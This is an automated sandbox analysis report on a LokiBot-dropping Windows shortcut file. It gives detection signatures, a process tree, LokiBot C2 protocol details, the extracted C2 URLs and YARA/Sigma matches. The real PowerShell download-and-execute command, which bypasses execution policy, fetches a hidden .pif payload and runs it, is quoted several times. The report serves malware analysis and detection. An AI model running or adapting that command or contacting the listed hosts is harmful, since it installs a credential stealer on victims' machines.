Edit tour

Windows Analysis Report
Comprobante.lnk.lnk

Overview

General Information

Sample name:	Comprobante.lnk.lnk
Analysis ID:	1524797
MD5:	8c19af87f9129a49e35158f93815eb7f
SHA1:	9a6c4b22c2e5bf7f039eb2ad20d0822c0e913d14
SHA256:	245f1f3463841248c78c4917dc1a846419f92d957132fabf0b4ee4501dcb6198
Tags:	lnkuser-abuse_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Windows shortcut file (LNK) starts blacklisted processes

Yara detected Lokibot

Yara detected Powershell download and execute

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Drops PE files with a suspicious file extension

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has nameless sections

Powershell drops PE file

Sigma detected: PowerShell DownloadFile

Suspicious powershell command line found

Tries to download and execute files (via powershell)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses dynamic DNS services

Windows shortcut file (LNK) contains suspicious command line arguments

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: PowerShell Download Pattern

Sigma detected: PowerShell Web Download

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 7360 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden'; MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

screens.pif (PID: 2208 cmdline: "C:\Users\user\Desktop\screens.pif" MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)

screens.pif (PID: 688 cmdline: C:\Users\user\Desktop\screens.pif MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)

screens.pif (PID: 5852 cmdline: C:\Users\user\Desktop\screens.pif MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)

WerFault.exe (PID: 5632 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)

screens.pif (PID: 6092 cmdline: C:\Users\user\Desktop\screens.pif MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)

WerFault.exe (PID: 6184 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2659632439.00000000013D8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x191cc:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x650f:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x14d53:$des3: 68 03 66 00 00 0x191cc:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x19298:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x18c8c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x5fcf:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000004.00000002.1509596429.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x14813:$des3: 68 03 66 00 00 0x18c8c:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x18d58:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x1b70c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x8a4f:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000004.00000002.1509596429.0000000002F32000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x17293:$des3: 68 03 66 00 00 0x1b70c:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1b7d8:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17da8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x5173:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000004.00000002.1517752482.0000000004988000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x139b7:$des3: 68 03 66 00 00 0x17da8:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17e74:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: powershell.exe PID: 7360	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: screens.pif PID: 2208	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: screens.pif PID: 2208	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: screens.pif PID: 2208	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x2918:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0xedf56:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0xf108c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x1a0efe:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: screens.pif PID: 688	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: screens.pif PID: 688	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: screens.pif PID: 688	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: screens.pif PID: 688	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x75f5:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 36 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.screens.pif.49889b8.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
4.2.screens.pif.49889b8.2.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
4.2.screens.pif.49889b8.2.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
4.2.screens.pif.49889b8.2.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
4.2.screens.pif.49889b8.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.screens.pif.49889b8.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
4.2.screens.pif.49889b8.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
4.2.screens.pif.49889b8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
4.2.screens.pif.49889b8.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
4.2.screens.pif.49889b8.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
4.2.screens.pif.49889b8.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
4.2.screens.pif.49889b8.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
4.2.screens.pif.49889b8.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
5.2.screens.pif.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.2.screens.pif.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.screens.pif.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.screens.pif.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
5.2.screens.pif.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
5.2.screens.pif.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
5.2.screens.pif.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.2.screens.pif.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
5.2.screens.pif.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
5.2.screens.pif.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
5.2.screens.pif.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.screens.pif.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
5.2.screens.pif.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
5.2.screens.pif.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
5.2.screens.pif.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
5.2.screens.pif.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 24 entries

Other

Source	Rule	Description	Author	Strings
amsi64_7360.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell DownloadFile

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, ProcessId: 7360, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, ProcessId: 7360, ProcessName: powershell.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\Desktop\screens.pif" , CommandLine: "C:\Users\user\Desktop\screens.pif" , CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\screens.pif, NewProcessName: C:\Users\user\Desktop\screens.pif, OriginalFileName: C:\Users\user\Desktop\screens.pif, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7360, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\Desktop\screens.pif" , ProcessId: 2208, ProcessName: screens.pif

Sigma detected: PowerShell Download Pattern

Source: Process started

